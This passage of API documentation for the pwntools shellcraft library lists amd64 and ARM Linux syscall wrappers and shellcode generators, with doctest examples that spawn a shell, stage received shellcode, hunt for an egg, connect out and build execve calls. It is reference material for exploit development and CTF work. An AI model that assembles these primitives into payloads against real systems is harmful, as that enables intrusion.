>>> p = run_assembly(shellcraft.amd64.linux.sh()) >>> p.sendline('echo Hello') >>> p.recv() 'Hello\n'
-
pwnlib.shellcraft.amd64.linux.
sigaction
(sig, act, oact)[source]¶ Invokes the syscall sigaction. See ‘man 2 sigaction’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
sigaltstack
(ss, oss)[source]¶ Invokes the syscall sigaltstack. See ‘man 2 sigaltstack’ for more information.
Parameters: - ss (sigaltstack) – ss
- oss (sigaltstack) – oss
-
pwnlib.shellcraft.amd64.linux.
signal
(sig, handler)[source]¶ Invokes the syscall signal. See ‘man 2 signal’ for more information.
Parameters: - sig (int) – sig
- handler (sighandler_t) – handler
-
pwnlib.shellcraft.amd64.linux.
sigpending
(set)[source]¶ Invokes the syscall sigpending. See ‘man 2 sigpending’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.amd64.linux.
sigprocmask
(how, set, oset, sigsetsize)[source]¶ Invokes the syscall sigprocmask. See ‘man 2 sigprocmask’ for more information.
Parameters: - how (int) – how
- set (sigset_t) – set
- oset (sigset_t) – oset
- sigsetsize (size_t) – sigsetsize
-
pwnlib.shellcraft.amd64.linux.
sigreturn
()[source]¶ Invokes the syscall sigreturn. See ‘man 2 sigreturn’ for more information.
-
pwnlib.shellcraft.amd64.linux.
sigsuspend
(set)[source]¶ Invokes the syscall sigsuspend. See ‘man 2 sigsuspend’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.amd64.linux.
splice
(fdin, offin, fdout, offout, length, flags)[source]¶ Invokes the syscall splice. See ‘man 2 splice’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
stage
(fd=0, length=None)[source]¶ Migrates shellcode to a new buffer.
Parameters: Example
>>> p = run_assembly(shellcraft.stage()) >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) >>> p.pack(len(sc)) >>> p.send(sc) >>> p.recvline() 'Hello\n'
-
pwnlib.shellcraft.amd64.linux.
stager
(sock, size, handle_error=False)[source]¶ Recives a fixed sized payload into a mmaped buffer Useful in conjuncion with findpeer. After running the socket will be left in RDI. :param sock, the socket to read the payload from.: :param size, the size of the payload:
-
pwnlib.shellcraft.amd64.linux.
stat
(file, buf)[source]¶ Invokes the syscall stat. See ‘man 2 stat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.amd64.linux.
stat64
(file, buf)[source]¶ Invokes the syscall stat64. See ‘man 2 stat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.amd64.linux.
stime
(when)[source]¶ Invokes the syscall stime. See ‘man 2 stime’ for more information.
Parameters: when (time_t) – when
-
pwnlib.shellcraft.amd64.linux.
stty
(fd, params)[source]¶ Invokes the syscall stty. See ‘man 2 stty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.amd64.linux.
symlink
(from_, to)[source]¶ Invokes the syscall symlink. See ‘man 2 symlink’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.amd64.linux.
symlinkat
(from_, tofd, to)[source]¶ Invokes the syscall symlinkat. See ‘man 2 symlinkat’ for more information.
Parameters: - from (char) – from
- tofd (int) – tofd
- to (char) – to
-
pwnlib.shellcraft.amd64.linux.
sync
()[source]¶ Invokes the syscall sync. See ‘man 2 sync’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
sync_file_range
(fd, offset, count, flags)[source]¶ Invokes the syscall sync_file_range. See ‘man 2 sync_file_range’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (off64_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.amd64.linux.
syscall
(syscall=None, arg0=None, arg1=None, arg2=None, arg3=None, arg4=None, arg5=None)[source]¶ - Args: [syscall_number, *args]
- Does a syscall
Any of the arguments can be expressions to be evaluated by
pwnlib.constants.eval()
.Example
>>> print pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 1, 'rsp', 2, 0).rstrip() /* call execve(1, 'rsp', 2, 0) */ xor r10d, r10d /* 0 */ push (SYS_execve) /* 0x3b */ pop rax push 1 pop rdi push 2 pop rdx mov rsi, rsp syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 2, 1, 0, -1).rstrip() /* call execve(2, 1, 0, -1) */ push -1 pop r10 push (SYS_execve) /* 0x3b */ pop rax push 2 pop rdi push 1 pop rsi cdq /* rdx=0 */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall().rstrip() /* call syscall() */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('rax', 'rdi', 'rsi').rstrip() /* call syscall('rax', 'rdi', 'rsi') */ /* setregs noop */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('rbp', None, None, 1).rstrip() /* call syscall('rbp', ?, ?, 1) */ mov rax, rbp push 1 pop rdx syscall >>> print pwnlib.shellcraft.amd64.linux.syscall( ... 'SYS_mmap', 0, 0x1000, ... 'PROT_READ | PROT_WRITE | PROT_EXEC', ... 'MAP_PRIVATE | MAP_ANONYMOUS', ... -1, 0).rstrip() /* call mmap(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ push (MAP_PRIVATE | MAP_ANONYMOUS) /* 0x22 */ pop r10 push -1 pop r8 xor r9d, r9d /* 0 */ push (SYS_mmap) /* 9 */ pop rax xor edi, edi /* 0 */ push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop rdx mov esi, 0x1010101 /* 4096 == 0x1000 */ xor esi, 0x1011101 syscall
-
pwnlib.shellcraft.amd64.linux.
syslog
(pri, fmt, vararg)[source]¶ Invokes the syscall syslog. See ‘man 2 syslog’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
tee
(fdin, fdout, length, flags)[source]¶ Invokes the syscall tee. See ‘man 2 tee’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
time
(timer)[source]¶ Invokes the syscall time. See ‘man 2 time’ for more information.
Parameters: timer (time_t) – timer
-
pwnlib.shellcraft.amd64.linux.
timer_create
(clock_id, evp, timerid)[source]¶ Invokes the syscall timer_create. See ‘man 2 timer_create’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- evp (sigevent) – evp
- timerid (timer_t) – timerid
-
pwnlib.shellcraft.amd64.linux.
timer_delete
(timerid)[source]¶ Invokes the syscall timer_delete. See ‘man 2 timer_delete’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.amd64.linux.
timer_getoverrun
(timerid)[source]¶ Invokes the syscall timer_getoverrun. See ‘man 2 timer_getoverrun’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.amd64.linux.
timer_gettime
(timerid, value)[source]¶ Invokes the syscall timer_gettime. See ‘man 2 timer_gettime’ for more information.
Parameters: - timerid (timer_t) – timerid
- value (itimerspec) – value
-
pwnlib.shellcraft.amd64.linux.
timer_settime
(timerid, flags, value, ovalue)[source]¶ Invokes the syscall timer_settime. See ‘man 2 timer_settime’ for more information.
Parameters: - timerid (timer_t) – timerid
- flags (int) – flags
- value (itimerspec) – value
- ovalue (itimerspec) – ovalue
-
pwnlib.shellcraft.amd64.linux.
truncate
(file, length)[source]¶ Invokes the syscall truncate. See ‘man 2 truncate’ for more information.
Parameters: - file (char) – file
- length (off_t) – length
-
pwnlib.shellcraft.amd64.linux.
truncate64
(file, length)[source]¶ Invokes the syscall truncate64. See ‘man 2 truncate64’ for more information.
Parameters: - file (char) – file
- length (off64_t) – length
-
pwnlib.shellcraft.amd64.linux.
ulimit
(cmd, vararg)[source]¶ Invokes the syscall ulimit. See ‘man 2 ulimit’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
umask
(mask)[source]¶ Invokes the syscall umask. See ‘man 2 umask’ for more information.
Parameters: mask (mode_t) – mask
-
pwnlib.shellcraft.amd64.linux.
uname
(name)[source]¶ Invokes the syscall uname. See ‘man 2 uname’ for more information.
Parameters: name (utsname) – name
-
pwnlib.shellcraft.amd64.linux.
unlink
(name)[source]¶ Invokes the syscall unlink. See ‘man 2 unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.amd64.linux.
unlinkat
(fd, name, flag)[source]¶ Invokes the syscall unlinkat. See ‘man 2 unlinkat’ for more information.
Parameters:
Invokes the syscall unshare. See ‘man 2 unshare’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.amd64.linux.
ustat
(dev, ubuf)[source]¶ Invokes the syscall ustat. See ‘man 2 ustat’ for more information.
Parameters: - dev (dev_t) – dev
- ubuf (ustat) – ubuf
-
pwnlib.shellcraft.amd64.linux.
utime
(file, file_times)[source]¶ Invokes the syscall utime. See ‘man 2 utime’ for more information.
Parameters: - file (char) – file
- file_times (utimbuf) – file_times
-
pwnlib.shellcraft.amd64.linux.
utimensat
(fd, path, times, flags)[source]¶ Invokes the syscall utimensat. See ‘man 2 utimensat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
utimes
(file, tvp)[source]¶ Invokes the syscall utimes. See ‘man 2 utimes’ for more information.
Parameters: - file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.amd64.linux.
vfork
()[source]¶ Invokes the syscall vfork. See ‘man 2 vfork’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
vhangup
()[source]¶ Invokes the syscall vhangup. See ‘man 2 vhangup’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
vmsplice
(fdout, iov, count, flags)[source]¶ Invokes the syscall vmsplice. See ‘man 2 vmsplice’ for more information.
Parameters: - fdout (int) – fdout
- iov (iovec) – iov
- count (size_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.amd64.linux.
wait4
(pid, stat_loc, options, usage)[source]¶ Invokes the syscall wait4. See ‘man 2 wait4’ for more information.
Parameters: - pid (pid_t) – pid
- stat_loc (WAIT_STATUS) – stat_loc
- options (int) – options
- usage (rusage) – usage
-
pwnlib.shellcraft.amd64.linux.
waitid
(idtype, id, infop, options)[source]¶ Invokes the syscall waitid. See ‘man 2 waitid’ for more information.
Parameters: - idtype (idtype_t) – idtype
- id (id_t) – id
- infop (siginfo_t) – infop
- options (int) – options
-
pwnlib.shellcraft.amd64.linux.
waitpid
(pid, stat_loc, options)[source]¶ Invokes the syscall waitpid. See ‘man 2 waitpid’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
write
(fd, buf, n)[source]¶ Invokes the syscall write. See ‘man 2 write’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- n (size_t) – n
pwnlib.shellcraft.arm
— Shellcode for ARM¶
pwnlib.shellcraft.arm
¶
Shellcraft module containing generic ARM little endian shellcodes.
-
pwnlib.shellcraft.arm.
crash
()[source]¶ Crash.
Example
>>> run_assembly(shellcraft.crash()).poll(True) -11
-
pwnlib.shellcraft.arm.
itoa
(v, buffer='sp', allocate_stack=True)[source]¶ Converts an integer into its string representation, and pushes it onto the stack. Uses registers r0-r5.
Parameters: - v (str, int) – Integer constant or register that contains the value to convert.
- alloca –
Example
>>> sc = shellcraft.arm.mov('r0', 0xdeadbeef) >>> sc += shellcraft.arm.itoa('r0') >>> sc += shellcraft.arm.linux.write(1, 'sp', 32) >>> run_assembly(sc).recvuntil('\x00') '3735928559\x00'
-
pwnlib.shellcraft.arm.
memcpy
(dest, src, n)[source]¶ Copies memory.
Parameters: - dest – Destination address
- src – Source address
- n – Number of bytes
-
pwnlib.shellcraft.arm.
mov
(dst, src)[source]¶ Move src into dest.
Support for automatically avoiding newline and null bytes has to be done.
If src is a string that is not a register, then it will locally set context.arch to ‘arm’ and use
pwnlib.constants.eval()
to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of context.os.Examples
>>> print shellcraft.arm.mov('r0','r1').rstrip() mov r0, r1 >>> print shellcraft.arm.mov('r0', 5).rstrip() mov r0, #5 >>> print shellcraft.arm.mov('r0', 0x34532).rstrip() movw r0, #0x34532 & 0xffff movt r0, #0x34532 >> 16 >>> print shellcraft.arm.mov('r0', 0x101).rstrip() movw r0, #0x101 >>> print shellcraft.arm.mov('r0', 0xff << 14).rstrip() mov r0, #0x3fc000 >>> print shellcraft.arm.mov('r0', 0xff << 15).rstrip() movw r0, #0x7f8000 & 0xffff movt r0, #0x7f8000 >> 16 >>> print shellcraft.arm.mov('r0', 0xf00d0000).rstrip() eor r0, r0 movt r0, #0xf00d0000 >> 16 >>> print shellcraft.arm.mov('r0', 0xffff00ff).rstrip() mvn r0, #(0xffff00ff ^ (-1)) >>> print shellcraft.arm.mov('r0', 0x1fffffff).rstrip() mvn r0, #(0x1fffffff ^ (-1))
Parameters:
-
pwnlib.shellcraft.arm.
push
(word, register='r12')[source]¶ Pushes a 32-bit integer onto the stack. Uses r12 as a temporary register.
r12 is defined as the inter-procedural scartch register ($ip), so this should not interfere with most usage.
Parameters: - word (int, str) – The word to push
- tmpreg (str) – Register to use as a temporary register. R7 is used by default.
-
pwnlib.shellcraft.arm.
pushstr
(string, append_null=True, register='r7')[source]¶ Pushes a string onto the stack.
Parameters: Examples
>>> print shellcraft.arm.pushstr("Hello!").rstrip() /* push 'Hello!\x00A' */ movw r7, #0x4100216f & 0xffff movt r7, #0x4100216f >> 16 push {r7} movw r7, #0x6c6c6548 & 0xffff movt r7, #0x6c6c6548 >> 16 push {r7}
-
pwnlib.shellcraft.arm.
pushstr_array
(reg, array)[source]¶ Pushes an array/envp-style array of pointers onto the stack.
Parameters: - reg (str) – Destination register to hold the pointer.
- array (str,list) – Single argument or list of arguments to push. NULL termination is normalized so that each argument ends with exactly one NULL byte.
-
pwnlib.shellcraft.arm.
ret
(return_value=None)[source]¶ A single-byte RET instruction.
Parameters: return_value – Value to return Examples
>>> with context.local(arch='arm'): ... print enhex(asm(shellcraft.ret())) ... print enhex(asm(shellcraft.ret(0))) ... print enhex(asm(shellcraft.ret(0xdeadbeef))) 1eff2fe1 000020e01eff2fe1 ef0e0be3ad0e4de31eff2fe1
-
pwnlib.shellcraft.arm.
setregs
(reg_context, stack_allowed=True)[source]¶ Sets multiple registers, taking any register dependencies into account (i.e., given eax=1,ebx=eax, set ebx first).
Parameters: Example
>>> print shellcraft.setregs({'r0':1, 'r2':'r3'}).rstrip() mov r0, #1 mov r2, r3 >>> print shellcraft.setregs({'r0':'r1', 'r1':'r0', 'r2':'r3'}).rstrip() mov r2, r3 eor r0, r0, r1 /* xchg r0, r1 */ eor r1, r0, r1 eor r0, r0, r1
-
pwnlib.shellcraft.arm.
udiv_10
(N)[source]¶ Divides r0 by 10. Result is stored in r0, N and Z flags are updated.
- Code is from generated from here:
- https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py
- With code:
- python magic.py 10 code_for_unsigned
-
pwnlib.shellcraft.arm.
xor
(key, address, count)[source]¶ XORs data a constant value.
Parameters: Example
>>> sc = shellcraft.read(0, 'sp', 32) >>> sc += shellcraft.xor(0xdeadbeef, 'sp', 32) >>> sc += shellcraft.write(1, 'sp', 32) >>> io = run_assembly(sc) >>> io.send(cyclic(32)) >>> result = io.recvn(32) >>> expected = xor(cyclic(32), p32(0xdeadbeef)) >>> result == expected True
pwnlib.shellcraft.arm.linux
¶
Shellcraft module containing ARM shellcodes for Linux.
-
pwnlib.shellcraft.arm.linux.
accept
(fd, addr, addr_len)[source]¶ Invokes the syscall accept. See ‘man 2 accept’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- addr_len (socklen_t) – addr_len
-
pwnlib.shellcraft.arm.linux.
access
(name, type)[source]¶ Invokes the syscall access. See ‘man 2 access’ for more information.
Parameters: - name (char) – name
- type (int) – type
-
pwnlib.shellcraft.arm.linux.
acct
(name)[source]¶ Invokes the syscall acct. See ‘man 2 acct’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.arm.linux.
alarm
(seconds)[source]¶ Invokes the syscall alarm. See ‘man 2 alarm’ for more information.
Parameters: seconds (unsigned) – seconds
-
pwnlib.shellcraft.arm.linux.
bind
(fd, addr, length)[source]¶ Invokes the syscall bind. See ‘man 2 bind’ for more information.
Parameters: - fd (int) – fd
- addr (CONST_SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.arm.linux.
brk
(addr)[source]¶ Invokes the syscall brk. See ‘man 2 brk’ for more information.
Parameters: addr (void) – addr
-
pwnlib.shellcraft.arm.linux.
cacheflush
()[source]¶ Invokes the cache-flush operation, without using any NULL or newline bytes.
Effectively is just:
mov r0, #0 mov r1, #-1 mov r2, #0 swi 0x9F0002How this works:
... However, SWI generates a software interrupt and to the interrupt handler, 0x9F0002 is actually data and as a result will not be read via the instruction cache, so if we modify the argument to SWI in our self-modifyign code, the argument will be read correctly.
-
pwnlib.shellcraft.arm.linux.
cat
(filename, fd=1)[source]¶ Opens a file and writes its contents to the specified file descriptor.
Example
>>> f = tempfile.mktemp() >>> write(f, 'FLAG\n') >>> run_assembly(shellcraft.arm.linux.cat(f)).recvline() 'FLAG\n'
-
pwnlib.shellcraft.arm.linux.
chdir
(path)[source]¶ Invokes the syscall chdir. See ‘man 2 chdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.arm.linux.
chmod
(file, mode)[source]¶ Invokes the syscall chmod. See ‘man 2 chmod’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.arm.linux.
chown
(file, owner, group)[source]¶ Invokes the syscall chown. See ‘man 2 chown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.arm.linux.
chroot
(path)[source]¶ Invokes the syscall chroot. See ‘man 2 chroot’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.arm.linux.
clock_getres
(clock_id, res)[source]¶ Invokes the syscall clock_getres. See ‘man 2 clock_getres’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- res (timespec) – res
-
pwnlib.shellcraft.arm.linux.
clock_gettime
(clock_id, tp)[source]¶ Invokes the syscall clock_gettime. See ‘man 2 clock_gettime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.arm.linux.
clock_nanosleep
(clock_id, flags, req, rem)[source]¶ Invokes the syscall clock_nanosleep. See ‘man 2 clock_nanosleep’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- flags (int) – flags
- req (timespec) – req
- rem (timespec) – rem
-
pwnlib.shellcraft.arm.linux.
clock_settime
(clock_id, tp)[source]¶ Invokes the syscall clock_settime. See ‘man 2 clock_settime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.arm.linux.
clone
(fn, child_stack, flags, arg, vararg)[source]¶ Invokes the syscall clone. See ‘man 2 clone’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
close
(fd)[source]¶ Invokes the syscall close. See ‘man 2 close’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.arm.linux.
connect
(host, port, network='ipv4')[source]¶ Connects to the host on the specified port. Network is either ‘ipv4’ or ‘ipv6’. Leaves the connected socket in R6.
-
pwnlib.shellcraft.arm.linux.
creat
(file, mode)[source]¶ Invokes the syscall creat. See ‘man 2 creat’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.arm.linux.
dir
(in_fd='r6', size=2048, allocate_stack=True)[source]¶ Reads to the stack from a directory.
Parameters: You can optioanlly shave a few bytes not allocating the stack space.
The size read is left in eax.
-
pwnlib.shellcraft.arm.linux.
dup
(fd)[source]¶ Invokes the syscall dup. See ‘man 2 dup’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.arm.linux.
dup2
(fd, fd2)[source]¶ Invokes the syscall dup2. See ‘man 2 dup2’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
dup3
(fd, fd2, flags)[source]¶ Invokes the syscall dup3. See ‘man 2 dup3’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
echo
(string, sock='1')[source]¶ Writes a string to a file descriptor
Example
>>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() 'hello\n'
-
pwnlib.shellcraft.arm.linux.
egghunter
(egg, start_address = 0, double_check = True)[source]¶ Searches for an egg, which is either a four byte integer or a four byte string. The egg must appear twice in a row if double_check is True. When the egg has been found the egghunter branches to the address following it. If start_address has been specified search will start on the first address of the page that contains that address.
-
pwnlib.shellcraft.arm.linux.
epoll_create
(size)[source]¶ Invokes the syscall epoll_create. See ‘man 2 epoll_create’ for more information.
Parameters: size (int) – size
-
pwnlib.shellcraft.arm.linux.
epoll_create1
(flags)[source]¶ Invokes the syscall epoll_create1. See ‘man 2 epoll_create1’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.arm.linux.
epoll_ctl
(epfd, op, fd, event)[source]¶ Invokes the syscall epoll_ctl. See ‘man 2 epoll_ctl’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
epoll_pwait
(epfd, events, maxevents, timeout, ss)[source]¶ Invokes the syscall epoll_pwait. See ‘man 2 epoll_pwait’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
epoll_wait
(epfd, events, maxevents, timeout)[source]¶ Invokes the syscall epoll_wait. See ‘man 2 epoll_wait’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
execve
(path='/bin///sh', argv=[], envp={})[source]¶ Execute a different process.
>>> path = '/bin/sh' >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] >>> envp = {'NAME': 'zerocool', 'STATUS': 3} >>> sc = shellcraft.arm.linux.execve(path, argv, envp) >>> io = run_assembly(sc) >>> io.recvall() 'Hello, zerocool\n' >>> io.poll(True) 3
-
pwnlib.shellcraft.arm.linux.
exit
(status)[source]¶ Invokes the syscall exit. See ‘man 2 exit’ for more information.
Parameters: status (int) – status
-
pwnlib.shellcraft.arm.linux.
faccessat
(fd, file, type, flag)[source]¶ Invokes the syscall faccessat. See ‘man 2 faccessat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fallocate
(fd, mode, offset, length)[source]¶ Invokes the syscall fallocate. See ‘man 2 fallocate’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fchdir
(fd)[source]¶ Invokes the syscall fchdir. See ‘man 2 fchdir’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.arm.linux.
fchmod
(fd, mode)[source]¶ Invokes the syscall fchmod. See ‘man 2 fchmod’ for more information.
Parameters: - fd (int) – fd
- mode (mode_t) – mode
-
pwnlib.shellcraft.arm.linux.
fchmodat
(fd, file, mode, flag)[source]¶ Invokes the syscall fchmodat. See ‘man 2 fchmodat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fchown
(fd, owner, group)[source]¶ Invokes the syscall fchown. See ‘man 2 fchown’ for more information.
Parameters: - fd (int) – fd
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.arm.linux.
fchownat
(fd, file, owner, group, flag)[source]¶ Invokes the syscall fchownat. See ‘man 2 fchownat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fcntl
(fd, cmd, vararg)[source]¶ Invokes the syscall fcntl. See ‘man 2 fcntl’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fdatasync
(fildes)[source]¶ Invokes the syscall fdatasync. See ‘man 2 fdatasync’ for more information.
Parameters: fildes (int) – fildes
-
pwnlib.shellcraft.arm.linux.
flock
(fd, operation)[source]¶ Invokes the syscall flock. See ‘man 2 flock’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fork
()[source]¶ Invokes the syscall fork. See ‘man 2 fork’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
forkexit
()[source]¶ Attempts to fork. If the fork is successful, the parent exits.
-
pwnlib.shellcraft.arm.linux.
fstat
(fd, buf)[source]¶ Invokes the syscall fstat. See ‘man 2 fstat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fstat64
(fd, buf)[source]¶ Invokes the syscall fstat64. See ‘man 2 fstat64’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fstatat64
(fd, file, buf, flag)[source]¶ Invokes the syscall fstatat64. See ‘man 2 fstatat64’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
fsync
(fd)[source]¶ Invokes the syscall fsync. See ‘man 2 fsync’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.arm.linux.
ftruncate
(fd, length)[source]¶ Invokes the syscall ftruncate. See ‘man 2 ftruncate’ for more information.
Parameters: - fd (int) – fd
- length (off_t) – length
-
pwnlib.shellcraft.arm.linux.
ftruncate64
(fd, length)[source]¶ Invokes the syscall ftruncate64. See ‘man 2 ftruncate64’ for more information.
Parameters: - fd (int) – fd
- length (off64_t) – length
-
pwnlib.shellcraft.arm.linux.
futimesat
(fd, file, tvp)[source]¶ Invokes the syscall futimesat. See ‘man 2 futimesat’ for more information.
Parameters: - fd (int) – fd
- file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.arm.linux.
getcwd
(buf, size)[source]¶ Invokes the syscall getcwd. See ‘man 2 getcwd’ for more information.
Parameters: - buf (char) – buf
- size (size_t) – size
-
pwnlib.shellcraft.arm.linux.
getdents
(fd, dirp, count)[source]¶ Invokes the syscall getdents. See ‘man 2 getdents’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
getegid
()[source]¶ Invokes the syscall getegid. See ‘man 2 getegid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
geteuid
()[source]¶ Invokes the syscall geteuid. See ‘man 2 geteuid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
getgid
()[source]¶ Invokes the syscall getgid. See ‘man 2 getgid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
getgroups
(size, list)[source]¶ Invokes the syscall getgroups. See ‘man 2 getgroups’ for more information.
Parameters: - size (int) – size
- list (gid_t) – list
-
pwnlib.shellcraft.arm.linux.
getitimer
(which, value)[source]¶ Invokes the syscall getitimer. See ‘man 2 getitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- value (itimerval) – value
-
pwnlib.shellcraft.arm.linux.
getpeername
(fd, addr, length)[source]¶ Invokes the syscall getpeername. See ‘man 2 getpeername’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.arm.linux.
getpgid
(pid)[source]¶ Invokes the syscall getpgid. See ‘man 2 getpgid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.arm.linux.
getpgrp
()[source]¶ Invokes the syscall getpgrp. See ‘man 2 getpgrp’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
getpid
()[source]¶ Invokes the syscall getpid. See ‘man 2 getpid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
getpmsg
(fildes, ctlptr, dataptr, bandp, flagsp)[source]¶ Invokes the syscall getpmsg. See ‘man 2 getpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
getppid
()[source]¶ Invokes the syscall getppid. See ‘man 2 getppid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
getpriority
(which, who)[source]¶ Invokes the syscall getpriority. See ‘man 2 getpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
-
pwnlib.shellcraft.arm.linux.
getresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall getresgid. See ‘man 2 getresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.arm.linux.
getresuid
(ruid, euid, suid)[source]¶ Invokes the syscall getresuid. See ‘man 2 getresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.arm.linux.
getrlimit
(resource, rlimits)[source]¶ Invokes the syscall getrlimit. See ‘man 2 getrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.arm.linux.
getrusage
(who, usage)[source]¶ Invokes the syscall getrusage. See ‘man 2 getrusage’ for more information.
Parameters: - who (rusage_who_t) – who
- usage (rusage) – usage
-
pwnlib.shellcraft.arm.linux.
getsid
(pid)[source]¶ Invokes the syscall getsid. See ‘man 2 getsid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.arm.linux.
getsockname
(fd, addr, length)[source]¶ Invokes the syscall getsockname. See ‘man 2 getsockname’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.arm.linux.
getsockopt
(fd, level, optname, optval, optlen)[source]¶ Invokes the syscall getsockopt. See ‘man 2 getsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
gettimeofday
(tv, tz)[source]¶ Invokes the syscall gettimeofday. See ‘man 2 gettimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone_ptr_t) – tz
-
pwnlib.shellcraft.arm.linux.
getuid
()[source]¶ Invokes the syscall getuid. See ‘man 2 getuid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
gtty
(fd, params)[source]¶ Invokes the syscall gtty. See ‘man 2 gtty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.arm.linux.
ioctl
